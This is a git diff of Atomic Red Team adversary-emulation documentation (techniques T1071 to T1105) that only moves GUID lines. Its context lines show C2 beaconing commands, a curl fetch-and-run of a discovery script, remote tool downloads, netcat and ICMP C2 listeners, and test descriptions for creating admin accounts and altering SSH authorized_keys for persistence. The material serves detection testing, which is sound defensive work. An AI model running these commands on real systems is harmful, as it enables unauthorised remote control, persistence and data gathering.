## Atomic Test #1 - Malicious User Agents - Powershell - -auto_generated_guid: 81c13829-f6c9-45b8-85a6-053366d55297 - This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat + **Supported Platforms:** Windows +**auto_generated_guid:** 81c13829-f6c9-45b8-85a6-053366d55297 + + + #### Inputs: @@ -53,16 +55,18 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
## Atomic Test #2 - Malicious User Agents - CMD - -auto_generated_guid: dc3488b0-08c7-4fea-b585-905c83b48180 - This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat + **Supported Platforms:** Windows +**auto_generated_guid:** dc3488b0-08c7-4fea-b585-905c83b48180 + + + #### Inputs: @@ -107,14 +111,16 @@ Remove-Item $env:temp\curl.zip
## Atomic Test #3 - Malicious User Agents - Nix - -auto_generated_guid: 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 - This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 + + + #### Inputs: diff --git a/atomics/T1071.004/T1071.004.md b/atomics/T1071.004/T1071.004.md index 17f935e4..d637d611 100644 --- a/atomics/T1071.004/T1071.004.md +++ b/atomics/T1071.004/T1071.004.md @@ -18,15 +18,17 @@ The DNS protocol serves an administrative function in computer networking and th
## Atomic Test #1 - DNS Large Query Volume - -auto_generated_guid: 1700f5d6-5a44-487b-84de-bc66f507b0a6 - This test simulates an infected host sending a large volume of DNS queries to a command and control server. The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout. + **Supported Platforms:** Windows +**auto_generated_guid:** 1700f5d6-5a44-487b-84de-bc66f507b0a6 + + + #### Inputs: @@ -54,15 +56,17 @@ for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}"
## Atomic Test #2 - DNS Regular Beaconing - -auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 - This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time. This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout. + **Supported Platforms:** Windows +**auto_generated_guid:** 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 + + + #### Inputs: @@ -93,15 +97,17 @@ Set-Location PathToAtomicsFolder
## Atomic Test #3 - DNS Long Domain Query - -auto_generated_guid: fef31710-223a-40ee-8462-a396d6b66978 - This test simulates an infected host returning data to a command and control server using long domain names. The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold. Upon execution, DNS information about the domain will be displayed for each callout. + **Supported Platforms:** Windows +**auto_generated_guid:** fef31710-223a-40ee-8462-a396d6b66978 + + + #### Inputs: @@ -129,18 +135,20 @@ Set-Location PathToAtomicsFolder
## Atomic Test #4 - DNS C2 - -auto_generated_guid: e7bf9802-2e78-4db9-93b5-181b7bcd37d7 - This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. The following blogs have more information. https://github.com/iagox86/dnscat2 https://github.com/lukebaggett/dnscat2-powershell + **Supported Platforms:** Windows +**auto_generated_guid:** e7bf9802-2e78-4db9-93b5-181b7bcd37d7 + + + #### Inputs: diff --git a/atomics/T1072/T1072.md b/atomics/T1072/T1072.md index 7148ce67..e4d9008d 100644 --- a/atomics/T1072/T1072.md +++ b/atomics/T1072/T1072.md @@ -14,13 +14,15 @@ The permissions required for this action vary by system configuration; local cre
## Atomic Test #1 - Radmin Viewer Utility - -auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129 - An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. + **Supported Platforms:** Windows +**auto_generated_guid:** b4988cad-6ed2-434d-ace5-ea2670782129 + + + #### Inputs: diff --git a/atomics/T1074.001/T1074.001.md b/atomics/T1074.001/T1074.001.md index 99d5bd9a..18147371 100644 --- a/atomics/T1074.001/T1074.001.md +++ b/atomics/T1074.001/T1074.001.md @@ -14,14 +14,16 @@
## Atomic Test #1 - Stage data from Discovery.bat - -auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f - Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 107706a5-6f9f-451a-adae-bab8c667829f + + + #### Inputs: @@ -50,13 +52,15 @@ Remove-Item -Force #{output_file} -ErrorAction Ignore
## Atomic Test #2 - Stage data from Discovery.sh - -auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 - Utilize curl to download discovery.sh and execute a basic information gathering shell script + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 39ce0303-ae16-4b9e-bb5b-4f53e8262066 + + + #### Inputs: @@ -81,14 +85,16 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp - -auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a - Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. + **Supported Platforms:** Windows +**auto_generated_guid:** a57fbe4b-3440-452a-88a7-943531ac872a + + + #### Inputs: diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md index 3f1b6291..3d3aef89 100644 --- a/atomics/T1078.001/T1078.001.md +++ b/atomics/T1078.001/T1078.001.md @@ -12,14 +12,16 @@ Default accounts are not limited to client machines, rather also include account
## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges - -auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections. + **Supported Platforms:** Windows +**auto_generated_guid:** 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 + + + #### Inputs: diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md index 88b2cf6e..5bc00429 100644 --- a/atomics/T1078.003/T1078.003.md +++ b/atomics/T1078.003/T1078.003.md @@ -12,13 +12,15 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
## Atomic Test #1 - Create local account with admin priviliges - -auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 - After execution the new account will be active and added to the Administrators group + **Supported Platforms:** Windows +**auto_generated_guid:** a524ce99-86de-4db6-b4f9-e08f35a47a15 + + + diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 579b4cce..d83db839 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -34,13 +34,15 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
## Atomic Test #1 - System Information Discovery - -auto_generated_guid: 66703791-c902-4560-8770-42b8a91f7667 - Identify System Info. Upon execution, system info and time info will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 66703791-c902-4560-8770-42b8a91f7667 + + + @@ -61,13 +63,15 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
## Atomic Test #2 - System Information Discovery - -auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 - Identify System Info + **Supported Platforms:** macOS +**auto_generated_guid:** edff98ec-0f73-4f63-9890-6b117092aff6 + + + @@ -88,13 +92,15 @@ ls -al /Applications
## Atomic Test #3 - List OS Information - -auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c - Identify System Info + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c + + + #### Inputs: @@ -128,13 +134,15 @@ rm #{output_file} 2>/dev/null
## Atomic Test #4 - Linux VM Check via Hardware - -auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec - Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. + **Supported Platforms:** Linux +**auto_generated_guid:** 31dad7ad-2286-4c02-ae92-274418c85fec + + + @@ -161,13 +169,15 @@ if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
## Atomic Test #5 - Linux VM Check via Kernel Modules - -auto_generated_guid: 8057d484-0fae-49a4-8302-4812c4f1e64e - Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. + **Supported Platforms:** Linux +**auto_generated_guid:** 8057d484-0fae-49a4-8302-4812c4f1e64e + + + @@ -191,13 +201,15 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
## Atomic Test #6 - Hostname Discovery (Windows) - -auto_generated_guid: 85cfbf23-4a1e-4342-8792-007e004b975f - Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 85cfbf23-4a1e-4342-8792-007e004b975f + + + @@ -217,13 +229,15 @@ hostname
## Atomic Test #7 - Hostname Discovery - -auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 - Identify system hostname for Linux and macOS systems. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133 + + + @@ -243,13 +257,15 @@ hostname
## Atomic Test #8 - Windows MachineGUID Discovery - -auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 - Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. + **Supported Platforms:** Windows +**auto_generated_guid:** 224b4daf-db44-404e-b6b2-f4d1f0126ef8 + + + @@ -269,16 +285,18 @@ REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
## Atomic Test #9 - Griffon Recon - -auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 - Griffon is a sophisticated tool believed to be in use by one of more "APT" groups. This atomic is for detecting, specifically, the reconnaissance part of the tool. This script used here was reduced by security researcher Kirk Sayre (github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d), and it gives the exact same recon behavior as the original (minus the C2 interaction). For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon and https://attack.mitre.org/software/S0417/ + **Supported Platforms:** Windows +**auto_generated_guid:** 69bd4abe-8759-49a6-8d21-0f15822d6370 + + + #### Inputs: @@ -303,13 +321,15 @@ cscript #{vbscript}
## Atomic Test #10 - Environment variables discovery on windows - -auto_generated_guid: f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 - Identify all environment variables. Upon execution, environments variables and your path info will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 + + + @@ -329,13 +349,15 @@ set
## Atomic Test #11 - Environment variables discovery on macos and linux - -auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 - Identify all environment variables. Upon execution, environments variables and your path info will be displayed. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720 + + + diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index 7bd81b17..6003c66b 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -18,14 +18,16 @@ Many command shell utilities can be used to obtain this information. Examples in
## Atomic Test #1 - File and Directory Discovery (cmd.exe) - -auto_generated_guid: 0e36303b-6762-4500-b003-127743b80ba6 - Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of all of the data discovery commands. + **Supported Platforms:** Windows +**auto_generated_guid:** 0e36303b-6762-4500-b003-127743b80ba6 + + + @@ -51,13 +53,15 @@ tree /F >> %temp%\download
## Atomic Test #2 - File and Directory Discovery (PowerShell) - -auto_generated_guid: 2158908e-b7ef-4c21-8a83-3ce4dd05a924 - Find or discover files on the file system. Upon execution, file and folder information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 2158908e-b7ef-4c21-8a83-3ce4dd05a924 + + + @@ -79,9 +83,6 @@ gci -recurse
## Atomic Test #3 - Nix File and Diectory Discovery - -auto_generated_guid: ffc8b249-372a-4b74-adcd-e4c0430842de - Find or discover files on the file system References: @@ -89,9 +90,14 @@ References: http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/ https://perishablepress.com/list-files-folders-recursively-terminal/ + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** ffc8b249-372a-4b74-adcd-e4c0430842de + + + #### Inputs: @@ -127,13 +133,15 @@ rm #{output_file}
## Atomic Test #4 - Nix File and Directory Discovery 2 - -auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e - Find or discover files on the file system + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 13c5e1ae-605b-46c4-a79f-db28c77ff24e + + + #### Inputs: diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md index 98eebaf4..065f757c 100644 --- a/atomics/T1087.001/T1087.001.md +++ b/atomics/T1087.001/T1087.001.md @@ -32,13 +32,15 @@ Commands such as net user and net localgroup of the [N
## Atomic Test #1 - Enumerate all accounts (Local) - -auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f - Enumerate all accounts by copying /etc/passwd to another file + **Supported Platforms:** Linux +**auto_generated_guid:** f8aab3dd-5990-4bf8-b8ab-2226c951696f + + + #### Inputs: @@ -68,13 +70,15 @@ rm -f #{output_file}
## Atomic Test #2 - View sudoers access - -auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 - (requires root) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** fed9be70-0186-4bde-9f8a-20945f9370c2 + + + #### Inputs: @@ -104,13 +108,15 @@ rm -f #{output_file}
## Atomic Test #3 - View accounts with UID 0 - -auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 - View accounts with UID 0 + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** c955a599-3653-4fe5-b631-f11c00eb0397 + + + #### Inputs: @@ -140,13 +146,15 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #4 - List opened files by user - -auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb - List opened files by user + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb + + + @@ -166,13 +174,15 @@ username=$(id -u -n) && lsof -u $username
## Atomic Test #5 - Show if a user account has ever logged in remotely - -auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 - Show if a user account has ever logged in remotely + **Supported Platforms:** Linux +**auto_generated_guid:** 0f0b6a29-08c3-44ad-a30b-47fd996b2110 + + + #### Inputs: @@ -214,13 +224,15 @@ echo "Install lastlog on the machine to run the test."; exit 1;
## Atomic Test #6 - Enumerate users and groups - -auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e - Utilize groups and id to enumerate users and groups + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** e6f36545-dc1e-47f0-9f48-7f730f54a02e + + + @@ -241,13 +253,15 @@ id
## Atomic Test #7 - Enumerate users and groups - -auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 - Utilize local utilities to enumerate users and groups + **Supported Platforms:** macOS +**auto_generated_guid:** 319e9f6c-7a9e-432e-8c62-9385c803b6f2 + + + @@ -271,14 +285,16 @@ dscacheutil -q user
## Atomic Test #8 - Enumerate all accounts on Windows (Local) - -auto_generated_guid: 80887bec-5a9b-4efc-a81d-f83eb2eb32ab - Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session + **Supported Platforms:** Windows +**auto_generated_guid:** 80887bec-5a9b-4efc-a81d-f83eb2eb32ab + + + @@ -302,13 +318,15 @@ net localgroup
## Atomic Test #9 - Enumerate all accounts via PowerShell (Local) - -auto_generated_guid: ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b - Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b + + + @@ -336,13 +354,15 @@ net localgroup
## Atomic Test #10 - Enumerate logged on users via CMD (Local) - -auto_generated_guid: a138085e-bfe5-46ba-a242-74a6fb884af3 - Enumerate logged on users. Upon exeuction, logged on users will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a138085e-bfe5-46ba-a242-74a6fb884af3 + + + @@ -362,13 +382,15 @@ query user
## Atomic Test #11 - Enumerate logged on users via PowerShell - -auto_generated_guid: 2bdc42c7-8907-40c2-9c2b-42919a00fe03 - Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 2bdc42c7-8907-40c2-9c2b-42919a00fe03 + + + diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index 8949d5be..02fd9e3e 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -30,14 +30,16 @@ Commands such as net user /domain and net group /domain ## Atomic Test #1 - Enumerate all accounts (Domain) - -auto_generated_guid: 6fbc9e68-5ad7-444a-bd11-8bf3136c477e - Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session + **Supported Platforms:** Windows +**auto_generated_guid:** 6fbc9e68-5ad7-444a-bd11-8bf3136c477e + + + @@ -58,13 +60,15 @@ net group /domain
## Atomic Test #2 - Enumerate all accounts via PowerShell (Domain) - -auto_generated_guid: 8b8a6449-be98-4f42-afd2-dedddc7453b2 - Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 8b8a6449-be98-4f42-afd2-dedddc7453b2 + + + @@ -86,13 +90,15 @@ get-aduser -filter *
## Atomic Test #3 - Enumerate logged on users via CMD (Domain) - -auto_generated_guid: 161dcd85-d014-4f5e-900c-d3eaae82a0f7 - Enumerate logged on users. Upon exeuction, logged on users will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 161dcd85-d014-4f5e-900c-d3eaae82a0f7 + + + #### Inputs: @@ -117,14 +123,16 @@ query user /SERVER:#{computer_name}
## Atomic Test #4 - Automated AD Recon (ADRecon) - -auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 - ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 95018438-454a-468c-a0fa-59c800149b59 + + + #### Inputs: @@ -166,14 +174,16 @@ Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRe
## Atomic Test #5 - Adfind -Listing password policy - -auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600 - Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx + **Supported Platforms:** Windows +**auto_generated_guid:** 736b4f53-f400-4c22-855d-1a6b5a551600 + + + #### Inputs: @@ -210,14 +220,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #6 - Adfind - Enumerate Active Directory Admins - -auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/ + **Supported Platforms:** Windows +**auto_generated_guid:** b95fd967-4e62-4109-b48d-265edfd28c3a + + + #### Inputs: @@ -254,14 +266,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #7 - Adfind - Enumerate Active Directory User Objects - -auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 + + + #### Inputs: @@ -298,14 +312,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #8 - Adfind - Enumerate Active Directory Exchange AD Objects - -auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 5e2938fb-f919-47b6-8b29-2f6a1f718e99 + + + #### Inputs: @@ -342,13 +358,15 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #9 - Enumerate Default Domain Admin Details (Domain) - -auto_generated_guid: c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef - This test will enumerate the details of the built-in domain admin account + **Supported Platforms:** Windows +**auto_generated_guid:** c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef + + + @@ -368,16 +386,18 @@ net user administrator /domain
## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation - -auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b - Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + **Supported Platforms:** Windows +**auto_generated_guid:** 46f8dbe9-22a5-4770-8513-66119c5be63b + + + #### Inputs: diff --git a/atomics/T1090.001/T1090.001.md b/atomics/T1090.001/T1090.001.md index ba88f77c..7e9471af 100644 --- a/atomics/T1090.001/T1090.001.md +++ b/atomics/T1090.001/T1090.001.md @@ -16,15 +16,17 @@ By using a compromised internal system as a proxy, adversaries may conceal the t
## Atomic Test #1 - Connection Proxy - -auto_generated_guid: 0ac21132-4485-4212-a681-349e8a6637cd - Enable traffic redirection. Note that this test may conflict with pre-existing system configuration. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 0ac21132-4485-4212-a681-349e8a6637cd + + + #### Inputs: @@ -55,16 +57,18 @@ unset https_proxy
## Atomic Test #2 - Connection Proxy for macOS UI - -auto_generated_guid: 648d68c1-8bcd-4486-9abe-71c6655b6a2c - Enable traffic redirection on macOS UI (not terminal). The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface. Note that this test may conflict with pre-existing system configuration. + **Supported Platforms:** macOS +**auto_generated_guid:** 648d68c1-8bcd-4486-9abe-71c6655b6a2c + + + #### Inputs: @@ -97,15 +101,17 @@ networksetup -setsecurewebproxystate #{interface} off
## Atomic Test #3 - portproxy reg key - -auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a - Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 Upon execution there will be a new proxy entry in netsh netsh interface portproxy show all + **Supported Platforms:** Windows +**auto_generated_guid:** b8223ea9-4be2-44a6-b50a-9657a3d4e72a + + + #### Inputs: diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md index 35f06246..998ff39b 100644 --- a/atomics/T1095/T1095.md +++ b/atomics/T1095/T1095.md @@ -17,14 +17,16 @@ ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Ev
## Atomic Test #1 - ICMP C2 - -auto_generated_guid: 0268e63c-e244-42db-bef7-72a9e59fc1fc - This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/ + **Supported Platforms:** Windows +**auto_generated_guid:** 0268e63c-e244-42db-bef7-72a9e59fc1fc + + + #### Inputs: @@ -50,15 +52,17 @@ Invoke-PowerShellIcmp -IPAddress #{server_ip}
## Atomic Test #2 - Netcat C2 - -auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 - Start C2 Session Using Ncat To start the listener on a Linux device, type the following: nc -l -p + **Supported Platforms:** Windows +**auto_generated_guid:** bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 + + + #### Inputs: @@ -106,15 +110,17 @@ if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\
## Atomic Test #3 - Powercat C2 - -auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e - Start C2 Session Using Powercat To start the listener on a Linux device, type the following: nc -l -p + **Supported Platforms:** Windows +**auto_generated_guid:** 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e + + + #### Inputs: diff --git a/atomics/T1098.004/T1098.004.md b/atomics/T1098.004/T1098.004.md index 6aefc212..e3e11db8 100644 --- a/atomics/T1098.004/T1098.004.md +++ b/atomics/T1098.004/T1098.004.md @@ -12,14 +12,16 @@ Adversaries may modify SSH authorized_keys files directly with scri
## Atomic Test #1 - Modify SSH Authorized Keys - -auto_generated_guid: 342cc723-127c-4d3a-8292-9c0c6b4ecadc - Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 342cc723-127c-4d3a-8292-9c0c6b4ecadc + + + diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index b4409385..ff4d250c 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -12,13 +12,15 @@
## Atomic Test #1 - Admin Account Manipulate - -auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af - Manipulate Admin Account Name + **Supported Platforms:** Windows +**auto_generated_guid:** 5598f7cb-cf43-455e-883a-f6008c5d46af + + + @@ -64,9 +66,6 @@ foreach($u in $list) {
## Atomic Test #2 - Domain Account and Group Manipulate - -auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 - Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively, @@ -79,9 +78,14 @@ service account whose delegation is given onto a dedicated OU for user creation as group manager of the target group. Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }` + **Supported Platforms:** Windows +**auto_generated_guid:** a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 + + + #### Inputs: diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 4003a30d..caef3d08 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -36,13 +36,15 @@
## Atomic Test #1 - rsync remote file copy (push) - -auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 - Utilize rsync to perform a remote file copy (push) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409 + + + #### Inputs: @@ -70,13 +72,15 @@ rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
## Atomic Test #2 - rsync remote file copy (pull) - -auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f - Utilize rsync to perform a remote file copy (pull) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f + + + #### Inputs: @@ -104,13 +108,15 @@ rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
## Atomic Test #3 - scp remote file copy (push) - -auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 - Utilize scp to perform a remote file copy (push) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344 + + + #### Inputs: @@ -138,13 +144,15 @@ scp #{local_file} #{username}@#{remote_host}:#{remote_path}
## Atomic Test #4 - scp remote file copy (pull) - -auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 - Utilize scp to perform a remote file copy (pull) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33 + + + #### Inputs: @@ -172,13 +180,15 @@ scp #{username}@#{remote_host}:#{remote_file} #{local_path}
## Atomic Test #5 - sftp remote file copy (push) - -auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e - Utilize sftp to perform a remote file copy (push) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e + + + #### Inputs: @@ -206,13 +216,15 @@ sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
